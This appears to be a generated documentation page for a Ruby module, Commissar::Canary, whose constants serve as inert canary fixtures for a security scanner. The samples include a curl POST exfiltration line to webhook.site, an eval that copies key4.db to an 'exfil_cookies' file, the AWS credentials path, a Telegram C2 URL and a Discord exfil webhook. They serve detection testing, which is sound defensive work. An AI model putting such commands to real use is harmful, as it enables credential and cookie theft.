Module: Commissar::Canary
- Defined in:
- lib/commissar/canary.rb
Constant Summary collapse
- VERSION =
"0.1.0"- ETH_WALLET =
FORENSIC REF: Lazarus Group / Ronin Bridge hack, OFAC SDN April 2022
"0x098B716B8Aaf21512996dC57EB0615e2383E2f96"- BTC_WALLET =
FORENSIC REF: WannaCry ransomware, DOJ indictment 2018
"115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"- TELEGRAM_C2 =
FORENSIC REF: burned Telegram C2 token, format matches CVE-published samples
"https://api.telegram.org/bot1234567890:AAHdqTcvCH1vGWJxfSeofSAs0K5PALDsaw/sendMessage"- DISCORD_WEBHOOK =
FORENSIC REF: expired Discord exfil webhook
"https://discord.com/api/webhooks/987654321098765432/xXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXx"- EVAL_SAMPLE =
'eval("cp key4.db /tmp/exfil_cookies.db")'- AWS_CRED_SAMPLE =
'ENV["AWS_ACCESS_KEY_ID"]'- CRED_PATH_SAMPLE =
"~/.aws/credentials"- EXFIL_SAMPLE =
"curl -X POST https://webhook.site/canary-test -d @/dev/null"- ENCODED_PAYLOAD =
Decodes to: “COMMISSAR CANARY TEST FIXTURE — PAYLOAD IS INERT — DO NOT INSTALL IN PRODUCTION”
"Q09NTUlTU0FSIENBTkFSWSBURVNUIEZJWFRVUkUg4oCUIFBBWUxPQUQgSVMgSU5FUlQg4oCUIERPIE5PVCBJTI5TVEFMTCBJT" \ "iBQUk9EVUNUSU9O"
- LONG_LINE =
("COMMISSAR-CANARY-INERT-PAYLOAD-" * 20).freeze
- HOMOGLYPH_SAMPLE =
"аuthorize_user"